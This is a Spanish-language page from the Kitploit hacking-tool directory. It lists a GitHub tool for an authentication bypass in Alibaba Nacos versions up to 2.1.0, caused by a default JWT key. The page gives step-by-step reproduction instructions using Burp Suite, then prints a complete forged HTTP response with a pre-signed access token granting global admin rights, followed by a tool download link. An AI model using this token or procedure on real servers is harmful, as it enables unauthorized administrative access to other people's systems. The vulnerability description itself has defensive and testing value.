Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Alibab-Nacos-Unauthorized-Login — Alibab Nacos Unauthorized Login | Kitploit
Herramientas/GitHubGitHub/al1ex/alibab-nacos-unauthorized-login
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubal1ex/alibab-nacos-unauthorized-login

Alibab-Nacos-Unauthorized-Login

Alibab Nacos Unauthorized Login

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
142hace 3 añosAún no revisado

Impacto de la vulnerabilidad

Se ha descubierto un problema en Nacos que afecta a Nacos <= 2.1.0. Los usuarios de Nacos utilizan la clave JWT predeterminada, lo que provoca una vulnerabilidad de acceso no autorizado. Mediante esta vulnerabilidad, los atacantes pueden omitir la autenticación de nombre de usuario y contraseña e iniciar sesión directamente en el usuario de Nacos.

Producto vulnerable

Versión Nacos <= 2.1.0

Reproducción de la vulnerabilidad

Paso 1:Vaya directamente al sitio web de Nacos, complete cualquier nombre de usuario y contraseña y use Burpsuite para capturar el paquete.

inicio de sesión

Paso 2:Intercepte el paquete de respuesta.

respuesta

Paso 3: Modifique el paquete de datos de la siguiente manera

root@kitploit:~
HTTP/1.1 200
Date: Thu, 10 Nov 2022 01:27:16 GMT
Content-Type: application/json
Content-Length: 13
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Security-Policy: script-src 'self'
Server: elb

{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true}

nuevo

Paso 4: Inicie sesión correctamente después de liberar el paquete de datos.

éxito

Descargar herramienta